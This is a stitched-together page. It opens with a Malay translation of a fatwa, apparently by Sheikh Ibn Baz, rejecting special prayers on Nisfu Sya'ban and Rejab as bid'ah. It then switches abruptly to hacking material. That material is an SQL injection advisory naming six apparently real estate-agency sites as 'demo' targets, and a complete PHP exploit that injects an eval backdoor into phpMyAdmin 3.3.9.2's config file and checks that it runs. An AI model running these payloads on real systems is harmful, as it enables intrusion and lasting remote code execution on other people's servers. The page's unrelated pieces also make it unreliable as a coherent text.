Beberapa orang fuqaha’ telah tertipu oleh hadis palsu ini, antaranya pengarang al-Ihya’ dan lain-lain, dan juga sebahagian ulama mufassirin. Solat khusus di malam ini – di pertengahan bulan Syaaban – telah diterangkan dalam pelbagai bentuk, kesemuanya adalah palsu dan direka-reka.”

Al-Hafiz al-‘Iraqi berkata: “Hadith tentang solat di malam pertengahan Syaaban adalah maudhu’, dan disandarkan secara palsu terhadap Rasulullah s.a.w.”

Imam al-Nawawi berkata di dalam bukunya al-Majmu’: “Sembahyang yang dikenali sebagai solat al-raghaa’ib, didirikan sebanyak dua belas rakaat antara Maghrib dan ‘Isyak pada malam Jumaat pertama di bulan Rejab, dan sembahyang sunat Malam Nisfu Shaaban, sebanyak seratus rakaat – kedua-dua sembahyang ini adalah bid’ah yang tercela. Sepatutnya orang ramai tidak tertipu disebabkan ianya disebut dalam Qut al-Qulub dan Ihya’ ‘Ulum al-Din, atau oleh hadis-hadis yang disebutkan dalam kedua-dua kitab ini. Kesemuanya adalah palsu. Orang ramai juga tidak sepatutnya tertipu disebabkan kerana beberapa imam telah keliru dalam hal ini dan menulis beberapa helaian yang menyebut bahawa sembahyang ini adalah mustahabb (sunat), kerana dalam hal ini mereka tersilap.”

Sheikh al-Imam Abu Muhammad ‘Abd al-Rahman bin Isma’il al-Maqdisi telah menulis sebuah kitab yang amat berharga, yang membuktikan bahawa riwayat-riwayat tersebut adalah palsu, dan jasa beliau sangatlah besar. Alim `ulama telah membincangkan hal ini dengan panjang lebar, dan sekiranya kami ingin memetik keseluruhan perbincangan tersebut untuk dicatatkan di sini, tentu akan mengambil masa yang sangat panjang. Mudah-mudahan apa yang telah disebutkan di atas sudah memadai bagi anda yang mencari kebenaran.

Daripada ayat-ayat Qur’an, hadis-hadis dan pendapat ulama yang dipetik di atas, sudah jelas bagi kita bahawa menyambut pertengahan bulan Syaaban dengan cara bersembahyang di malamnya atau dengan mana-mana cara yang lain, atau dengan mengkhususkan puasa pada hari tersebut, adalah bid’ah yang ditolak oleh jumhur ulama. Amalan tersebut tiada asas dalam syariat Islam yang tulen; bahkan ianya hanyalah salah satu perkara yang diada-adakan dalam Islam selepas berakhirnya zaman Sahabat (radhiallahu `anhum).

Amat memadai, dalam hal ini, untuk kita fahami kalam Allah (mafhumnya):
“Pada hari ini Aku telah sempurnakan agama kamu untukmu..…”[al-Ma’idah 5:3]. dan beberapa ayat yang seumpamanya; dan kata-kata Nabi s.a.w: “Barangsiapa yang mengada-adakan perkara baru dalam urusan (agama) kita ini yang (pada hakikatnya) bukan sebahagian daripadanya, tidak akan diterima” dan beberapa hadis yang serupa.

Dalam Sahih Muslim diriwayatkan bahawa Abu Hurarah (R.A) berkata: “Rasulullah s.a.w bersabda: ‘Janganlah kamu khususkan malam Jumaat untuk bersembahyang malam dan janganlah khususkan siang hari Jumaat untuk berpuasa, melainkan jika puasa di hari itu adalah sebahagian daripada puasa-puasa yang kamu amalkan berterusan-berterusan.’”

Seandainya dibenarkan untuk mengkhususkan mana-mana malam untuk amalan ibadah yang istimewa, sudah tentu malam Jumaat adalah yang paling sesuai, kerana siang hari Jumaat adalah hari yang paling baik bermula terbit mataharinya, sebagaimana disebutkan dalam hadis Sahih yang diriwayatkan daripada Rasulullah s.a.w. Memandangkan Nabi Muhammad s.a.w sendiri melarang dari mengkhususkan malam tersebut untuk bertahajjud, itu menandakan bahawa adalah lebih dilarang sekiranya dikhususkan malam-malam lain untuk sebarang bentuk ibadat, kecuali di mana terdapat nas yang Sahih yang mengkhususkan malam tertentu.

Oleh kerana telah disyariatkan untuk memenuhi malam Lailatul-Qadr dan malam-malam lain di bulan Ramadhan dengan bersolat, Rasulullah s.a.w memberi perhatian kepadanya dan menyuruh umatnya bersolat malam sepanjang tempoh tersebut. Baginda sendiri melaksanakannya, sebagaimana disebut dalam al-Sahihain, bahawa Rasulullah s.a.w bersabda: “Barangsiapa bersolat qiyam di bulan Ramadan dengan penuh iman dan mengharapkan pahala, Allah akan ampunkan dosa-dosanya yang telah lalu” dan “Barangsiapa memenuhi malam Lailatul Qadr dengan bersolat (sunat) disebabkan iman dan mencari pahala, Allah ampunkan kesemua dosanya yang telah lalu.”

Akan tetapi sekiranya disyariatkan untuk mengkhususkan malam pertengahan bulan Syaaban, atau malam Jumaat pertama di bulan Rejab, atau di malam Isra’ dan Mi’raj, dengan meraikannya ataupun dengan melakukan amalan ibadat yang khusus, maka sudah tentu Rasulullah s.a.w telah mengajar umatnya melakukannya, dan Baginda sendiri melakukannya. Jika pernah berlaku sedemikian, para Sahabat Baginda (R.A) pasti akan memperturunkan amalan amalan tersebut kepada umat terkemudian; tidak mungkin mereka menyembunyikan amalan daripada umat terkemudian, kerana mereka adalah generasi yang terbaik dan yang paling amanah selepas Rasulullah, radhiallahu `anhum, dan semoga Allah merahmati kesemua sahabat Rasulullah s.a.w.

Sekarang kita telah membaca sendiri kata-kata ulama yang dipetik di atas bahawa tidak ada riwayat daripada Rasulullah s.a.w mahupun Para Sahabat (R.A) berkenaan kelebihan malam Jumaat pertama bulan Rejab, atau malam pertengahan bulan Syaaban. Maka kita tahu bahawa menyambut hari tersebut adalah satu perkara baru yang dimasukkan ke dalam Islam, dan mengkhususkan waktu-waktu ini untuk amalan ibadat tertentu adalah bid’ah yang tercela.

Samalah juga dengan sambutan malam ke dua puluh tujuh bulan Rejab, yang mana disangkakan oleh sesetengah orang sebagai malam Isra’ dan Mi’raj; tidak dibenarkan mengkhususkan hari tersebut untuk amalan tertentu, atau meraikan tarikh tersebut, berdasarkan dalil yang dipetik di atas. Ini sekiranya tarikh sebenar Isra’ and Mi’raj telah diketahui, maka bagaimana sekiranya pandangan ulama yang benar adalah tarikh sebanar Isra’ and Mi’raj tidak diketahui! Pandangan yang mengatakan ianya berlaku pada malam ke dua puluh tujuh di bulan Rejab adalah riwayat yang palsu yang tiada asas dalam hadis-hadis sahih. Baik sekiranya seseorang itu berkata: “Perkara paling baik adalah yang mengikut jalan para salaf, dan perkara paling buruk adalah perkara yang diada-adakan.”

Kita memohon agar Allah membantu kita dan seluruh umat Islam untuk berpegang teguh kepada Sunnah dan menjauhi segala yang bertentangan dengannya, kerana Dialah yang Maha Pemurah, lagi Maha Penyayang. Semoga Allah merahmati Pesuruh dan UtusanNya, Nabi kita Muhammad s.a.w, serta kesemua ahli keluarga dan Para Sahabat baginda.

Ulasan dan terjemahan fatwa : http://www.darulkautsar.com
[Dipetik daripada Majmu’ Fatawa Samahat al-Sheikh ‘Abdul-‘Aziz bin Baz, 2/882]

Rujukan :

1 – http://e-malabari.net/ugama/nisfusyaaban.htm
2 – http://www.darulkautsar.com

Realty Listing System sql Injection Vulnerability


Exploit In File

preview.php?id=
detail.php?id=

Demo Site
http://www.bundyinc.com/preview.php?id=1%27
http://clockworkrealty.com/preview.php?id=1%27
http://www.smithrealtyonline.com/preview.php?id=1%27
http://www.kenkoprealty.com/preview.php?id=1%27
http://www.zoellerag.com/preview.php?id=1%27
http://www.timandjim.com/preview.php?id=1%27

exploit
http://target/%5Bpath%5D/preview.php?id=1

0r
http://target/%5Bpath%5D/detail.php?id=1

Demo
http://target/[path]/detail.php?id=1 Injection Here
http://target/[path]/preview.php?id=1 Injection Here

Remote Code Injection


 i tried to share what i known for who interested...USE RESPONSIBLY.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
    if(!isset($argv[1])){
        output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
        killme();
    }
    $pmaurl = $argv[1];
}else{
    $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token  = null;
if(!function_exists('curl_init')){
    output('[!] Fatal error. Need cURL!');
    killme();
}
$ch     = curl_init();
$debug  = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
curl_setopt_array($ch, array(
    CURLOPT_URL => $pmaurl.'/setup/index.php',
    CURLOPT_HEADER => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 4,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
    output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
    killme();
}
if(!$result){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
    output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
    killme();
}

// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
    output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
    output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
    output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}

curl_close($ch);

function output($msg){
    echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
    flush();
}

function killme(){
    output("[*] Exiting...");
    echo php_sapi_name()!=='cli'?'<pre>':'';
    die();
}

echo php_sapi_name()!=='cli'?'<pre>':'';?>